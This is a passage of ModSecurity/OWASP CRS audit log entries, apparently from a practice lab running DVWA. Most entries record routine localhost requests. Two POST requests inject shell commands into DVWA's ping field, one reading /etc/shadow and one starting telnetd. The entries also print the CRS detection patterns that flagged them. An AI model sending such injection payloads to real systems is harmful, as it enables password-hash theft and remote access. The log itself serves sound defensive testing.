[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcZVX8AAQEAAAkVV4cAAAAA\"]"],"stopwatch":{"p1":470,"p2":863,"p3":46,"p4":245,"p5":160,"sr":20,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:34:27 --0400","transaction_id":"WRcZc38AAQEAAAmHBJAAAAAF","remote_address":"127.0.0.1","remote_port":41990,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","Connection":"keep-alive","If-Modified-Since":"Sat, 13 May 2017 13:57:53 GMT","If-None-Match":"\"15a-54f683559a2e3\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 14:34:24 GMT","ETag":"\"15a-54f68b7e775af\"","Accept-Ranges":"bytes","Content-Length":"346","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRcZc38AAQEAAAmHBJAAAAAF\"]"],"stopwatch":{"p1":518,"p2":1131,"p3":58,"p4":149,"p5":54,"sr":58,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:34:27 --0400","transaction_id":"WRcZc38AAQEAAAmHBJEAAAAF","remote_address":"127.0.0.1","remote_port":41990,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcZc38AAQEAAAmHBJEAAAAF\"]"],"stopwatch":{"p1":624,"p2":1164,"p3":47,"p4":276,"p5":50,"sr":26,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:10:34:27 --0400","transaction_id":"WRcZc38AAQEAAAmHBJIAAAAF","remote_address":"127.0.0.1","remote_port":41990,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRcZc38AAQEAAAmHBJIAAAAF\"]"],"stopwatch":{"p1":443,"p2":952,"p3":47,"p4":270,"p5":48,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:13 --0400","transaction_id":"WRczLX8AAQEAAAkW4RkAAAAB","remote_address":"192.168.75.145","remote_port":56752,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"43"},"body":["ip=%27%3B+cat+%2Fetc%2Fshadow&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/exec/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf\"] [line \"108\"] [id \"930120\"] [rev \"4\"] [msg \"OS File Access Attempt\"] [data \"Matched Data: etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-lfi\"] [tag \"OWASP_CRS/WEB_ATTACK/FILE_INJECTION\"] [tag \"WASCTC/WASC-33\"] [tag \"OWASP_TOP_10/A4\"] [tag \"PCI/6.5.4\"]","Warning. Pattern match \"(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\\".*\\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\\"]*(?:l[\\\\\\\\'\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; cat /etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Warning. Matched phrase \"etc/shadow\" at ARGS:ip. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"448\"] [id \"932160\"] [rev \"1\"] [msg \"Remote Command Execution: Unix Shell Code Found\"] [data \"Matched Data: etc/shadow found within ARGS:ip: cat/etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Matched phrase \"etc/shadow\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf\"] [line \"108\"] [id \"930120\"] [rev \"4\"] [msg \"OS File Access Attempt\"] [data \"Matched Data: etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-lfi\"] [tag \"OWASP_CRS/WEB_ATTACK/FILE_INJECTION\"] [tag \"WASCTC/WASC-33\"] [tag \"OWASP_TOP_10/A4\"] [tag \"PCI/6.5.4\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. 
Pattern match \"(?:;|\\\\\\\\\\\\\\\\{|\\\\\\\\\\\\\\\\||\\\\\\\\\\\\\\\\|\\\\\\\\\\\\\\\\||&|&&|\\\\\\\\\\\\\\\\n|\\\\\\\\\\\\\\\\r|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\$\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\(|`|\\\\\\\\\\\\\\\\${|<\\\\\\\\\\\\\\\\(|>\\\\\\\\\\\\\\\\(|\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\))\\\\\\\\\\\\\\\\s*(?:{|\\\\\\\\\\\\\\\\s*\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\w+=(?:[^\\\\\\\\\\\\\\\\s]*|\\\\\\\\\\\\\\\\$.*|\\\\\\\\\\\\\\\\$.*|<.*|>.*|\\\\\\\\\\\\\\\\'.*\\\\\\\\\\\\\\\\'|\\\\\\\\\".*\\\\\\\\\")\\\\\\\\\\\\\\\\s+|!\\\\\\\\\\\\\\\\s*|\\\\\\\\\\\\\\\\$)*\\\\\\\\\\\\\\\\s*(?:'|\\\\\\\\\")*(?:[\\\\\\\\\\\\\\\\?\\\\\\\\\\\\\\\\*\\\\\\\\\\\\\\\\[\\\\\\\\\\\\\\\\]\\\\\\\\\\\\\\\\(\\\\\\\\\\\\\\\\)\\\\\\\\\\\\\\\\-\\\\\\\\\\\\\\\\|+\\\\\\\\\\\\\\\\w'\\\\\\\\\"\\\\\\\\\\\\\\\\./\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]+/)?[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]*(?:l[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'\\\\\\\\\"]* ...\" at ARGS:ip. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"81\"] [id \"932100\"] [rev \"4\"] [msg \"Remote Command Execution: Unix Command Injection\"] [data \"Matched Data: ; cat /etc/shadow found within ARGS:ip: '; cat /etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"8\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Matched phrase \"etc/shadow\" at ARGS:ip. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf\"] [line \"448\"] [id \"932160\"] [rev \"1\"] [msg \"Remote Command Execution: Unix Shell Code Found\"] [data \"Matched Data: etc/shadow found within ARGS:ip: cat/etc/shadow\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-shell\"] [tag \"platform-unix\"] [tag \"attack-rce\"] [tag \"OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION\"] [tag \"WASCTC/WASC-31\"] [tag \"OWASP_TOP_10/A1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 18)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 18 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=10,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczLX8AAQEAAAkW4RkAAAAB\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":3732,"p2":8676,"p3":0,"p4":0,"p5":403,"sr":67,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:26 --0400","transaction_id":"WRczOn8AAQEAAAkXs@QAAAAC","remote_address":"192.168.75.145","remote_port":56754,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"POST /dvwa/vulnerabilities/exec/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive","Content-Type":"application/x-www-form-urlencoded","Content-Length":"31"},"body":["ip=%27%3B+telnetd&Submit=Submit"]},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/exec/\"] [unique_id \"WRczOn8AAQEAAAkXs@QAAAAC\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":1011,"p2":2755,"p3":97,"p4":551,"p5":127,"sr":45,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:24:26 --0400","transaction_id":"WRczOn8AAQEAAAkXs@UAAAAC","remote_address":"192.168.75.145","remote_port":56754,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/login.php HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/exec/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Expires":"Tue, 23 Jun 2009 12:00:00 GMT","Cache-Control":"no-cache, must-revalidate","Pragma":"no-cache","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"700","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html;charset=utf-8"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.145] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
